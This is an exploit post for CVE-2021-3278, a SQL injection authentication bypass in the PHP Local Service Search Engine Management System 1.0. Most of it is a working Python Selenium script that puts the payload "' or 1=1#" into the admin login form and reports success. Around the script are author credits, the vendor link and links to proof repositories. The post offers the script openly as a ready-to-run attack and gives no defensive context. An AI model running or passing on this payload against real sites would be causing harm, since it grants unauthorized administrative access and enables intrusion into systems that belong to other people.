Local Service Search Engine Management System 1.0 SQL Injection

Local Service Search Engine Management System version 1.0 remote SQL injection exploit that leverages the original discovery by Aditya Wakhlu in December of 2020.


MD5 | 76768d3ec18eaeb66f7b8b892054d4a3

# Exploit Title: SQL injection, bypass the login page, Local Service Search Engine Management System 1.0
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 06.02.2021
# Vendor: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3278/lssems.zip
# CVE: CVE-2021-3278
# Proof: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3278

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: @nu11secur1ty
# CVE: CVE-2021-3278

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://192.168.1.4/lssems/admin/login.php"

#enter your login username SQL bling injection
username="nu11secur1ty' or 1=1#"
#enter your login password SQL bling injection
password="nu11secur1ty' or 1=1#"

# test and proof the SQL injection
# user: admin
# password: password

#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"

#enter the element for submit button by class
element_for_submit="btn-sm.btn-block.btn-wave.col-md-4.btn-primary"

#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
time.sleep(3)
signInButton = browser.find_element_by_class_name(element_for_submit)
signInButton.click()

print("payload is deployed NOW, you have SQL Authentication Bypass =)...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")


---------------------------------

# Exploit Title: SQL injection, bypass the login page, Local Service Search
Engine Management System 1.0
# Date: 06.02.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage:
https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html
# Software Link:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3278/lssems.zip
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3278

Related Posts